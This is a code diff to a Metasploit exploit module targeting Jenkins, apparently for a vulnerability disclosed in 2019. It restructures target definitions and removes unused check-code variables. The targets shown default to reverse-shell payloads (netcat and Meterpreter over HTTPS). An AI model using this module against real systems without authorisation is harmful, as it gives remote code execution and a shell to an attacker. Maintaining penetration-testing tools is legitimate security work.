@@ -58,25 +58,27 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2019-01-08', # Public disclosure
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'java'],
-        'Arch' => [ARCH_CMD, ARCH_JAVA],
         'Privileged' => false,
         'Targets' => [
           [
             'Unix In-Memory',
-            'Platform' => 'unix',
-            'Arch' => ARCH_CMD,
-            'Version' => Rex::Version.new('2.137'),
-            'Type' => :unix_memory,
-            'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Version' => Rex::Version.new('2.137'),
+              'Type' => :unix_memory,
+              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' }
+            }
           ],
           [
             'Java Dropper',
-            'Platform' => 'java',
-            'Arch' => ARCH_JAVA,
-            'Version' => Rex::Version.new('2.137'),
-            'Type' => :java_dropper,
-            'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_https' }
+            {
+              'Platform' => 'java',
+              'Arch' => ARCH_JAVA,
+              'Version' => Rex::Version.new('2.137'),
+              'Type' => :java_dropper,
+              'DefaultOptions' => { 'PAYLOAD' => 'java/meterpreter/reverse_https' }
+            }
           ]
         ],
         'DefaultTarget' => 1,
@@ -100,8 +102,6 @@ class MetasploitModule < Msf::Exploit::Remote
   http://jenkins.local/securityRealm/user/admin/search/index?q=[keyword]
 =end
   def check
-    checkcode = CheckCode::Safe
-
     res = send_request_cgi(
       'method' => 'GET',
       'uri' => go_go_gadget1('/search/index'),
@@ -114,7 +114,6 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     vprint_status("Jenkins #{version} detected")
-    checkcode = CheckCode::Detected
 
     if Rex::Version.new(version) > target['Version']
       vprint_error("Jenkins #{version} is not a supported target")
